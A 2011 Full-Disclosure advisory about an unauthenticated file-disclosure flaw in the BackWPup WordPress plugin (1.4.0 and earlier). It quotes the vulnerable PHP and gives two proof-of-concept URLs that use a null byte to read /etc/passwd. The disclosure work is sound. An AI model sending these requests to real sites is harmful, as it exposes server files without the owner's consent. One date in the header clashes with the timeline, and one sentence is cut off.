[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] BackWPup Wordpress plugin <= 1.4.0 File content disclosure
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] BackWPup Wordpress plugin <= 1.4.0 File content disclosure
- From: Danilo Massa <danilo_m@xxxxxxxxx>
- Date: Mon, 28 Feb 2011 07:41:19 -0800 (PST)
=============================================
- Release date: Feb 28th, 2010
- Discovered by: Danilo Massa
- Severity: High
=============================================
I. VULNERABILITY
-------------------------
BackWPup Wordpress plugin <= 1.4.0 File content disclosure
II. BACKGROUND
-------------------------
BackWPup 1.4.0 is a full-featured backup management solution for Wordpress.
The plugin provide:
- Database Backup
- WordPress XML Export
- Optimize Database
- Check\Repair Database
- File Backup
- Backups in zip,tar,tar.gz,tar.bz2 format
- Store backup to Folder
- Store backup to FTP Server
- Store backup to Amazon S3
- Store backup to RackSpaceCloud
- Store backup to DropBox
- Send Log/Backup by eMail
III. INTRODUCTION
-------------------------
BackWPup version 1.4.0 (and may be the previous ones too) has an unfiltered
parameter inside
two php pages that let a remote user to access sensitive files like /etc/passwd.
No authentication required. No plugin activation required.
IV. DESCRIPTION
-------------------------
Input passed via the "wpabs" parameter to the php pages
- wp-content/plugins/backwpup/app/options-view_log-iframe.php
- wp-content/plugins/backwpup/app/options-runnow-iframe.php
is not sanitized before being used.
Both files starts trying to include the wp-load.php file using the wpabs
parameter that can
be inject with a direct call to the page.
options-view_log-iframe.php:
<?PHP
if (file_exists($_GET['wpabs'].'wp-load.php') and
file_exists($_GET['logfile']))
{
require_once($_GET['wpabs'].'wp-load.php'); /** Setup WordPress environment */
...
options-runnow-iframe.php:
if (file_exists($_GET['wpabs'].'wp-load.php') and
is_numeric(trim($_GET['jobid']))) {
require_once($_GET['wpabs'].'wp-load.php'); /** Setup WordPress environment */
...
inserting a string terminator %00 inside the wpabs parameter is possible to
specify a file
name instead of a directory and let it being included in the web page.
NOTE: also the
V. PROOF OF CONCEPT
-------------------------
Below is a harmless test that can be executed on a Unix machine that hosts
wordpress with the
vulnerable plugin.
http://<wordpress_site>/wp-content/plugins/backwpup/app/options-runnow-iframe.php?wpabs=/etc/passwd%00&jobid=1
http://<wordpress_site>/wp-content/plugins/backwpup/app/options-view_log-iframe.php?wpabs=/etc/passwd%00&logfile=/etc/passwd
Both of them will display the /etc/passwd file.
VI. BUSINESS IMPACT
-------------------------
An attacker could exploit the vulnerability to retrieve virtually any text file
accessible by the wep application server user.
VII. SYSTEMS AFFECTED
-------------------------
Version 1.4.0 is vulnerable.
Versions <1.4.0 could be vulnerable.
VIII. SOLUTION
-------------------------
Upgrade to a patched release or as quick workaround enclose
any $_GET['wpabs'] in a trim call like this:
if (file_exists(trim($_GET['wpabs']).'wp-load.php') and
file_exists($_GET['logfile'])) {
IX. REFERENCES
-------------------------
http://wordpress.org/extend/plugins/backwpup/
http://danielhuesken.de/portfolio/backwpup/
X. CREDITS
-------------------------
The vulnerability has been discovered by Danilo Massa
danilo(under_score)m(at)yahoo(dot)com
XI. VULNERABILITY HISTORY
-------------------------
January 28th, 2011: Vulnerability identification
January 30th, 2011: Vendor notification
January 30th, 2011: Vendor release an updated version (1.4.1)
February 28th, 2011: Vulnerability disclosure
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this
information.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/